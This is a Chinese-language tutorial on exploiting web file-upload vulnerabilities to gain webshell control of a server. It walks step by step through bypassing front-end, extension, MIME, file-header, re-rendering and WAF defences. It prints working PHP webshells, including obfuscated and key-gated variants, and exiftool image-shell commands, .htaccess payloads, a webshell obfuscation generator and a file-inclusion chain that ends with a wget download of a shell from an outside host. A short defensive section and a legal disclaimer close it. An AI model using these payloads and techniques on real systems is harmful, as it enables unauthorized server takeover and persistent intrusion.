1. 项目概述：从“上传点”到“控制权”的实战路径

在Web安全领域，文件上传功能一直是个高危地带，也是安全测试人员与攻击者反复博弈的焦点。很多刚入门的朋友，一听到“上传Webshell”就觉得很高深，或者认为只要找个一句话木马就能搞定。实际上，现代Web应用早已布下层层防御，从简单的后缀名黑名单，到复杂的文件内容检测、二次渲染，甚至结合WAF（Web应用防火墙）进行动态拦截。这个项目的核心，就是模拟一个真实的攻防场景，带你一步步拆解这些防御机制，理解其背后的原理，并找到绕过的方法，最终目标是在目标服务器上获取一个稳定的Webshell控制权。这不仅是技术操作，更是一种思维训练——你需要像防御者一样思考，才能找到作为攻击者的突破口。

整个过程可以看作一场“闯关游戏”。第一关是前端校验，可能只是JavaScript弹个警告；第二关是服务端对文件后缀、MIME类型的检查；第三关可能是对文件内容头部的检测，防止你上传一个图片马；第四关更狠，服务器可能会对上传的图片进行二次处理（比如压缩、裁剪），破坏你隐藏在其中的恶意代码；最后一关，可能还有目录权限、解析漏洞等陷阱在等着你。我们将逐一拆解这些关卡，并提供经过实战检验的绕过思路和具体操作。无论你是刚接触网络安全的学生，还是希望巩固Web渗透测试技能的从业者，这篇手把手的指南都将为你提供一条清晰的、可复现的实战路径。

2. 核心原理与防御机制深度解析

2.1 文件上传漏洞的根源：信任与校验的失衡

文件上传漏洞的本质，是应用程序对用户上传的文件过于信任，或者校验逻辑存在缺陷，导致攻击者能够上传并执行恶意脚本。一个健全的上传功能应该进行“纵深防御”，即在多个层面进行校验。常见的校验点包括：

1. 客户端校验：通常使用JavaScript在浏览器端检查文件后缀名、大小。这是最弱的一环，因为攻击者可以轻易地禁用浏览器JS、拦截修改HTTP请求，或者直接使用Burp Suite等工具绕过。
2. 服务端后缀名/MIME类型校验：服务器检查Content-Type字段（如image/jpeg）或文件扩展名（如.jpg,.png）。防御方通常会维护一个黑名单（禁止.php,.jsp等）或白名单（只允许.jpg,.png,.gif）。黑名单容易被绕过（如.php5,.phtml,.phps），而白名单策略则安全得多。
3. 文件内容校验：
   • 文件头检查：通过读取文件最前面的几个字节（魔数）来判断文件真实类型。例如，JPEG文件头是FF D8 FF E0，PNG文件头是89 50 4E 47。如果文件内容开头不是合法的图片头，则拒绝。
   • 图像二次渲染：这是最有效的防御手段之一。服务器使用GD库或ImageMagick等对上传的图片进行 resize、压缩、重新采样等操作。这个过程会完全重建图片的数据结构，任何嵌入在图片元数据（如EXIF）或像素数据中的恶意代码都会被清除。
4. WAF/安全软件动态检测：在流量层或服务器上，部署的安全产品会实时检测HTTP请求体，匹配已知的Webshell特征码或危险函数调用，一旦发现立即阻断。

注意：理解这些防御机制是绕过的前提。你的绕过技巧必须针对目标具体的校验策略。盲目尝试各种“奇技淫巧”成功率很低，且容易触发警报。

2.2 Webshell的选择与原理

Webshell是一段驻留在Web服务器上的脚本代码，它提供了一个Web界面的命令行环境，允许攻击者远程执行命令、管理文件、提权等。选择合适的Webshell是成功的关键。

1. 一句话木马：最经典、最简洁。例如PHP的<?php @eval($_POST[‘cmd’]);?>。它的优点是体积小，容易隐藏。缺点是功能单一，且eval、assert等函数是安全软件重点查杀对象，容易被检测。
2. 小马：功能比一句话木马更丰富，通常包含文件管理、数据库操作等基础功能，代码量在几十到几百行。它是上传后的第一个“据点”，用于上传功能更强大的“大马”。
3. 大马/多功能木马：功能齐全的Web管理工具，集成文件管理、数据库管理、命令执行、端口扫描、提权辅助等模块。体积大，特征明显，通常无法直接绕过内容检测上传，需要先上传“小马”作为跳板。
4. 免杀Webshell：通过对代码进行编码、加密、混淆、拆分等手段，绕过基于特征码的静态检测。例如，使用base64_decode、gzinflate等函数包裹恶意代码，或者将代码拆分成多个变量再拼接执行。

实操心得：在实战中，我通常会准备一个“武器库”。包括：

• 多个版本的一句话木马（使用不同变量名、加密方式）。
• 一个高度混淆、功能精简的“小马”，专门用于突破上传点后的首次连接。
• 一个功能强大的大马，但只在通过小马获得稳定立足点后，再上传到服务器。

3. 绕过检测的六层实战技法

3.1 第一层：绕过前端JavaScript校验

这几乎不能称之为“绕过”，因为太简单。方法有三：

• 浏览器禁用JS：在浏览器设置中关闭JavaScript执行。
• 拦截修改请求：使用Burp Suite抓取包含文件上传的HTTP请求，直接修改filename参数，将.jpg改为.php，然后转发。
• 直接构造请求：使用Python的requests库或curl命令，直接模拟上传请求，完全绕过浏览器。

示例：使用Burp Suite拦截修改

1. 浏览器正常选择一张图片shell.jpg（内容实为图片马）。
2. 开启Burp代理，上传文件。
3. 在Burp的Proxy -> Intercept标签页，看到被拦截的POST请求。
4. 找到Content-Disposition部分，将filename="shell.jpg"修改为filename="shell.php"。
5. 点击“Forward”发送修改后的请求。

提示：即使前端有校验，服务端也必须有校验。绕过前端只是第一步，通常用于测试服务端是否“裸奔”。

3.2 第二层：绕过服务端后缀名与MIME类型校验

场景A：黑名单策略黑名单可能遗漏某些可执行后缀。尝试以下后缀：

• .php5,.php7,.phtml(在某些配置下仍被解析为PHP)
• .phps,.phpt
• .jspx,.jspf(JSP变种)
• .asa,.cer,.aspx(IIS服务器相关)
• 大小写混淆：.Php,.pHp
• 双后缀：.php.jpg(利用解析漏洞，见3.5节)
• 后缀后加空格、点、::$DATA(Windows特性)：shell.php.,shell.php

场景B：白名单策略白名单（只允许.jpg,.png,.gif）更安全，直接改后缀行不通。此时需要结合：

1. %00截断（已较少见，PHP<5.3.4）：在路径中注入空字符%00，使后续校验失效。如上传路径为/upload/，文件名可控，可构造shell.jpg%00.php，最终服务器可能保存为shell.php。
2. 解析漏洞（见3.5节）。
3. 文件内容欺骗（见3.3节）。

MIME类型绕过： 服务器检查Content-Type。抓包后直接修改该字段即可。

• 将Content-Type: application/x-php改为Content-Type: image/jpeg

3.3 第三层：绕过文件内容头检测

服务器检查文件开头几个字节是否符合图片格式。应对方法是制作“图片马”。

制作方法：

1. 命令行合成（Linux/Mac）：

   # 将一句话木马追加到正常图片后面 cat normal.jpg shell.php > shell.jpg

   这种方法简单，但容易被检测出文件尾部有异常数据。

2. 使用文件头欺骗：

   • 准备一个正常图片文件（如test.jpg）。
   • 用十六进制编辑器（如010 Editor）打开它，记住文件头（如FF D8 FF E0）。
   • 创建你的Webshell文件shell.php，在<?php前面插入图片的文件头。这样，文件检测看到的是图片头，但PHP解析器会忽略这些字节，直接解析后面的<?php。
   • 更稳妥的方法：将Webshell代码写入图片的EXIF信息中。使用exiftool工具：

     exiftool -Comment='<?php @eval($_POST[“cmd”]);?>' normal.jpg

     生成的图片，其注释字段包含了恶意代码。然后需要配合文件包含漏洞（LFI）或解析漏洞来执行这段代码。

实操心得：单纯的“文件头+Webshell”拼接，对于进行完整文件结构校验或二次渲染的服务器无效。它主要针对只检查文件头前几个字节的简单校验。

3.4 第四层：对抗图像二次渲染

这是最难绕过的一关。服务器对图片进行重绘，会破坏嵌入的代码。思路是：让我们的恶意代码“存活”在重绘后的图片中。

1. 研究渲染算法：针对GD库或ImageMagick，研究其在处理特定格式图片（如PNG、GIF）时，哪些数据块会被保留。例如，PNG由一系列“数据块”（Chunk）组成，如IHDR,IDAT,IEND等。可以尝试将代码嵌入到某些辅助数据块（如tEXt,zTXt,iTXt）中，这些块可能不会被处理。
2. 利用渲染瑕疵：在某些版本的图像处理库中，对异常或特制的图片文件处理时，可能会触发逻辑错误，导致渲染后的图片仍包含部分原始数据。这需要深入的漏洞研究（CVE），例如过去ImageMagick曾出现的“幽灵代码”漏洞。
3. 实战妥协方案：如果目标存在文件包含漏洞，那么二次渲染就不再是问题。我们上传一个包含恶意代码的图片马（用exiftool写入），然后利用文件包含漏洞去包含这个图片文件，服务器就会把图片中的<?php ... ?>当作PHP代码执行。因此，上传漏洞+文件包含漏洞的组合是黄金搭档。

3.5 第五层：利用服务器解析漏洞

这是“四两拨千斤”的方法，不直接对抗上传校验，而是利用服务器或中间件解析文件的特性来执行恶意代码。

经典案例：

• IIS 5.x/6.0 目录解析漏洞：如果目录名包含.asp,.asa,.cer等，则该目录下所有文件都会被当作ASP脚本来解析。可上传shell.jpg到/upload/asp/目录。
• IIS 6.0 分号解析漏洞：shell.asp;.jpg会被IIS 6.0解析为shell.asp。
• Apache 多后缀解析漏洞（mod_php配置不当）：如果Apache配置了AddHandler php5-script .php，但未严格定义，那么shell.php.jpg有可能被解析为PHP文件。
• Nginx 解析漏洞（错误配置）：如果Nginx配置了location ~ \.php$，且fastcgi_split_path_info处理不当，那么/upload/shell.jpg/xxx.php这个URL，Nginx可能会将shell.jpg传递给PHP-FPM，而PHP-FPM因为PATH_INFO的设置而将其解析为PHP。关键在于URL路径中.php后缀的出现。
• Windows 文件名特性：shell.php.（末尾有点）、shell.php（末尾有空格）、shell.php::$DATA，在Windows系统上保存时，后缀的点、空格、流标识符会被去除，最终文件名为shell.php。

3.6 第六层：WAF/安全软件绕过

当请求被WAF拦截时，需要混淆请求数据。

1. 数据编码：
   • 多重编码：对文件名或请求体进行多次URL编码、Base64编码。例如，shell.php编码为%2573%2568%2565%256c%256c%252e%2570%2568%2570（双重URL编码）。
   • 请求体分块传输：使用Transfer-Encoding: chunked，将请求体分块，可能绕过一些基于正则匹配的WAF。
2. 参数污染：上传表单通常有多个参数（如name,file）。可以重复提交同一个参数名，但值不同，如filename=shell.jpg&filename=shell.php。不同服务器处理方式不同，可能取第一个或最后一个值，从而造成混淆。
3. 畸形请求：构造畸形的HTTP请求头，如换行符不一致、超长头部等，可能使WAF解析失败而放行。
4. Webshell免杀：这是关键。将一句话木马变形。
   • 字符串变换：$_POST[‘cmd’]改为$_POST[‘a’]。
   • 变量函数：$a=”eval”; $b=$_POST[‘cmd’]; @$a($b);
   • 加密解密：eval(base64_decode(‘ZXZhbCgkX1BPU1RbJ2NtZCddKTs=’));
   • 利用回调函数：$p=’assert’; $p($_POST[‘cmd’]);
   • 拆分合并：将代码拆分成多个字符串，再用.连接起来。

4. 完整实战演练：从零获取Webshell

假设我们目标是一个存在白名单校验（仅允许.jpg/.png）且检查文件头的上传点。

4.1 信息收集与侦察

1. 确定技术栈：使用Wappalyzer插件或查看HTTP响应头，发现目标为Apache/2.4 + PHP 7.2。
2. 测试上传点：找到头像上传、附件上传等功能。尝试上传正常图片，成功。上传.php文件，返回“文件类型不允许”。
3. 抓包分析：用Burp Suite拦截上传请求，发现除了检查Content-Type，请求体中还有filename=”test.jpg”。服务端返回路径为/uploads/202405/xxxxxx.jpg。
4. 探测解析漏洞：尝试访问/uploads/202405/xxxxxx.jpg/xxx.php，返回404。尝试上传shell.php.jpg，服务器保存后文件名仍是shell.php.jpg，直接访问该文件，显示源码而非执行，说明不存在简单的多后缀解析漏洞。
5. 寻找其他漏洞：同时用目录扫描工具扫描，发现可能存在/include.php?file=xxx这样的参数，提示有文件包含的可能性。

4.2 制作免杀图片马

鉴于存在文件包含的可能，我们采用“图片马+文件包含”的组合拳。

1. 准备一个干净的normal.jpg。
2. 使用exiftool将一句话木马写入注释：

   exiftool -Comment='<?php if(isset($_GET["c"])){system($_GET["c"]);}?>' normal.jpg -o shell.jpg

   这里改用$_GET，方便在URL中直接执行命令。system()函数比eval()更直接用于命令执行。
3. 验证：用文本编辑器或strings命令查看shell.jpg尾部，应能看到插入的PHP代码。

4.3 实施上传与绕过

1. 浏览器选择shell.jpg上传，Burp Suite拦截请求。
2. 将filename改为shell.jpg（保持原名，因为白名单），确保Content-Type: image/jpeg。
3. 放行请求，上传成功，返回文件路径：/uploads/202405/a1b2c3d4e5.jpg。

4.4 利用文件包含漏洞执行代码

1. 访问探测到的文件包含点：http://target.com/include.php?file=/uploads/202405/a1b2c3d4e5.jpg
2. 如果包含成功，服务器会读取图片文件内容。当PHP解析器遇到<?php ... ?>标签时，就会执行其中的代码。
3. 在包含的URL后添加参数执行命令：http://target.com/include.php?file=/uploads/202405/a1b2c3d4e5.jpg&c=whoami
4. 页面返回了命令执行结果（如www-data），证明Webshell生效。

4.5 升级为更稳定的Webshell

通过文件包含执行命令不太方便，且依赖那个包含点。我们需要一个独立的Webshell。

1. 通过已获得的命令执行功能，写入一个更隐蔽的小马。
   • 使用echo命令写入文件：&c=echo '<?php @eval($_POST["pass"]);?>' > /var/www/html/uploads/small.php
   • 或者用wget从远程下载：&c=wget http://your-server.com/small.php -O /var/www/html/uploads/small.php
2. 直接访问这个新的Webshell：http://target.com/uploads/small.php，用中国菜刀或蚁剑等工具连接，密码为pass。
3. 连接成功后，你就获得了服务器的文件管理、数据库连接、虚拟终端等完整控制能力。

5. 高级技巧与深度免杀

5.1 动态密钥与自定义加密

静态的一句话木马特征太明显。可以设计一个动态密钥的Webshell。

<?php // 密钥隐藏在HTTP头中，例如自定义头 `X-Token` $key = $_SERVER['HTTP_X_TOKEN']; if($key == 'MY_SECRET_KEY_2024'){ $code = base64_decode($_POST['z']); eval($code); } ?>

连接时，需要在请求头中添加X-Token: MY_SECRET_KEY_2024，POST数据中z参数为base64编码的待执行代码。这大大增加了检测难度。

5.2 利用.htaccess或.user.ini文件

如果服务器是Apache，且允许上传.htaccess文件，这就是一个“大杀器”。.htaccess可以指定某个目录下的文件用特定程序解析。

1. 上传一个内容如下的.htaccess文件：

   AddType application/x-httpd-php .jpg

   这会让该目录下所有.jpg文件都被当作PHP执行。
2. 然后上传你的图片马shell.jpg，直接访问它，代码就会被执行。

对于PHP 5.3+，还可以利用.user.ini文件，设置auto_prepend_file或auto_append_file指向一个图片马，使得该目录下的所有PHP文件在解析时都自动包含这个图片马。

5.3 代码混淆与变形引擎

手动免杀效率低。可以编写简单的变形脚本，每次生成不同形式的Webshell。

import random import base64 func_names = ['system', 'exec', 'shell_exec', 'passthru'] var_names = ['a', 'b', 'c', 'x', 'y', 'z'] code = 'echo "Hello, World!";' # 随机选择函数和变量名 func = random.choice(func_names) var = random.choice(var_names) # 生成混淆代码 obfuscated = f'<?php\n${var}=base64_decode("{base64.b64encode(code.encode()).decode()}");\n{func}(${var});\n?>' print(obfuscated)

这个脚本每次都会生成变量名和函数名随机组合的Webshell，绕过基于固定特征码的检测。

6. 防御视角与安全建议

作为攻击者，我们研究绕过技术；但作为安全从业者或开发者，更应知道如何防御。

1. 使用白名单：严格限定只允许上传必要的后缀（如.jpg,.png,.pdf），并统一转为小写比对。
2. 重命名文件：使用随机字符串（如UUID）重命名上传的文件，避免用户控制文件名。
3. 文件内容校验：不仅检查文件头，最好使用底层库获取文件的真实MIME类型（如PHP的finfo_file）。
4. 图像二次渲染：对上传的图片进行缩放、裁剪、重新压缩并保存，这是最有效的手段。
5. 隔离存储：将上传的文件存储在Web根目录之外，通过后端脚本（如readfile()）来读取和分发。这样即使上传了Webshell，也无法直接通过URL访问执行。
6. 禁用危险函数：在php.ini中禁用eval(),assert(),system(),exec(),shell_exec(),passthru()等函数。
7. 定期安全扫描：使用Webshell扫描工具对上传目录进行定期扫描。
8. 最小权限原则：运行Web服务器的用户（如www-data）权限应尽可能低，不能执行敏感命令或写入关键目录。

7. 常见问题与排查实录

Q1：上传了Webshell，但访问返回404或403？

• 排查：检查文件是否真的上传成功（返回的路径是否正确）。检查目录权限（是否可读）。如果使用了.htaccess，检查Apache是否允许覆盖配置（AllowOverride All）。如果文件在Web根目录外，自然无法直接访问。

Q2：上传了图片马，但通过文件包含执行时没反应？

• 排查：首先确认文件包含漏洞是否存在且路径正确。用&c=echo “<?php phpinfo();?>” > test.php测试命令是否可执行。如果命令执行成功但包含图片马无效，可能是图片马中的PHP标签在二次渲染或保存时被破坏。尝试用exiftool查看图片的Comment字段是否还在。

Q3：连接Webshell时被WAF或主机安全软件拦截？

• 排查：尝试更换连接工具（如从中国菜刀换为蚁剑，或使用自定义的Python脚本）。修改Webshell的连接密码和参数名。使用HTTPS连接。在Webshell中使用更低调的命令执行方式，如pcntl_exec或反引号。

Q4：上传点对文件内容进行了严格的检测，图片马无效？

• 排查：尝试上传纯文本文件（如.txt），看是否允许。如果允许，可能存在日志文件包含、配置文件写入等其他利用链。或者，尝试寻找前端框架（如Vue/React）的上传组件漏洞，可能校验逻辑在前端，而服务端是“裸奔”的。

Q5：如何判断是否存在解析漏洞？

• 排查：上传一个内容为<?php echo “TEST”;?>的test.jpg文件。然后尝试访问：
  • test.jpg/.php
  • test.jpg/xxx.php
  • test.jpg%00.php(需URL编码)
  • test.jpg;.jpg观察是否输出TEST。同时，查看服务器类型和版本信息，对照已知的解析漏洞列表进行测试。

实操心得：文件上传漏洞的利用很少是一帆风顺的。真实环境中往往是多种防御手段叠加。我的习惯是，先进行最全面的信息收集（服务器、中间件、WAF、已有漏洞），然后从最温和的测试开始（如修改后缀、MIME类型），逐步升级到更复杂的方法（图片马、解析漏洞、组合漏洞）。保持耐心，像解谜一样思考每一层防御可能存在的逻辑缝隙，这才是安全测试的魅力所在。最后，请务必记住，所有技术学习都应在合法授权的环境中进行，未经授权的测试是违法行为。